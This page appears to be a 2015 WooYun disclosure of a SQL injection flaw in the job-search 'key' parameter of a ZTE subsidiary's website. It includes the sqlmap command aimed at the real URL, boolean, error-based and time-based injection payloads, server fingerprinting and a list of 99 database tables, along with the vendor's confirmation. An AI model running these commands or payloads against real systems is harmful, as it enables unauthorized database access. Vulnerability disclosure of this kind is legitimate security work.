当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-095913

漏洞标题:中兴某分站存在SQL注入漏洞

相关厂商:中兴通讯股份有限公司

漏洞作者: 深度安全实验室

提交时间:2015-02-06 09:58

修复时间:2015-03-23 10:00

公开时间:2015-03-23 10:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-06: 细节已通知厂商并且等待厂商处理中
2015-02-06: 厂商已经确认,细节仅向厂商公开
2015-02-16: 细节向核心白帽子及相关领域专家公开
2015-02-26: 细节向普通白帽子公开
2015-03-08: 细节向实习白帽子公开
2015-03-23: 细节向公众公开

简要描述:

详细说明:


漏洞证明:

http://www.zte-gt.com/


中兴国通通讯装备技术(北京)有限公司(以下简称“中兴国通”) 于2009年在北京成立,是由中兴通讯股份有限公司(以下简称“中兴通讯”)绝对控股,致力于行业、政企等专用通讯装备子公司。
存在SQL注入漏洞:

sqlmap.py -u "http://www.zte-gt.com/job/index.php?key=经理" --no-cast --dbs

1.jpg


ztegt库:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: key
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: key=经理') AND 8666=8666 AND ('WgPr'='WgPr
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: key=经理') AND (SELECT 7610 FROM(SELECT COUNT(*),CONCAT(0x716b7a6871,(SELECT (CASE WHEN (7610=7610) THEN 1 ELSE 0 END)),0x71756c6171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('Bsem'='Bsem
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: key=经理') AND SLEEP(5) AND ('pVdW'='pVdW
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5.0
Database: ztegt
[99 tables]
+--------------------------+
| pwn_advs_duilian |
| pwn_advs_lb |
| pwn_advs_lbgroup |
| pwn_advs_link |
| pwn_advs_linkgroup |
| pwn_advs_logo |
| pwn_advs_movi |
| pwn_advs_pic |
| pwn_advs_pop |
| pwn_advs_text |
| pwn_base_admin |
| pwn_base_adminauth |
| pwn_base_adminmenu |
| pwn_base_adminrights |
| pwn_base_border |
| pwn_base_coltype |
| pwn_base_config |
| pwn_base_pageset |
| pwn_base_pagetemp |
| pwn_base_plus |
| pwn_base_plusdefault |
| pwn_base_plusplan |
| pwn_base_plusplanid |
| pwn_base_plustemp |
| pwn_base_version |
| pwn_comment |
| pwn_comment_cat |
| pwn_comment_config |
| pwn_down_cat |
| pwn_down_con |
| pwn_down_config |
| pwn_down_downlog |
| pwn_down_pages |
| pwn_down_pcat |
| pwn_down_proj |
| pwn_down_prop |
| pwn_feedback |
| pwn_feedback_group |
| pwn_feedback_info |
| pwn_job |
| pwn_job_form |
| pwn_job_telent |
| pwn_member |
| pwn_member_buylist |
| pwn_member_cat |
| pwn_member_centlog |
| pwn_member_centrule |
| pwn_member_centset |
| pwn_member_config |
| pwn_member_defaultrights |
| pwn_member_fav |
| pwn_member_friends |
| pwn_member_group |
| pwn_member_msn |
| pwn_member_notice |
| pwn_member_nums |
| pwn_member_pay |
| pwn_member_paycenter |
| pwn_member_regstep |
| pwn_member_rights |
| pwn_member_secure |
| pwn_member_type |
| pwn_member_zone |
| pwn_menu |
| pwn_menu_group |
| pwn_news_cat |
| pwn_news_con |
| pwn_news_config |
| pwn_news_downlog |
| pwn_news_pages |
| pwn_news_pcat |
| pwn_news_proj |
| pwn_news_prop |
| pwn_page |
| pwn_page_group |
| pwn_photo_cat |
| pwn_photo_con |
| pwn_photo_config |
| pwn_photo_pages |
| pwn_photo_pcat |
| pwn_photo_proj |
| pwn_photo_prop |
| pwn_product_cat |
| pwn_product_con |
| pwn_product_config |
| pwn_product_pages |
| pwn_product_pcat |
| pwn_product_proj |
| pwn_product_prop |
| pwn_tools_code |
| pwn_tools_photopolldata |
| pwn_tools_photopollindex |
| pwn_tools_pollconfig |
| pwn_tools_polldata |
| pwn_tools_pollindex |
| pwn_tools_statbase |
| pwn_tools_statcome |
| pwn_tools_statcount |
| pwn_tools_statdate |
+--------------------------+


内容我就不去看了。。

修复方案:

版权声明:转载请注明来源 深度安全实验室@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-02-06 16:59

厂商回复:

感谢~

最新状态:

暂无


漏洞评价:

评论

  1. 2015-02-06 13:43 | kydhzy ( 普通白帽子 | Rank:362 漏洞数:62 | 软件测试)

    中兴确认好慢

  2. 2015-02-06 17:00 | 中兴通讯股份有限公司(乌云厂商)

    @kydhzy 不慢吧,我这边收到2天内肯定确认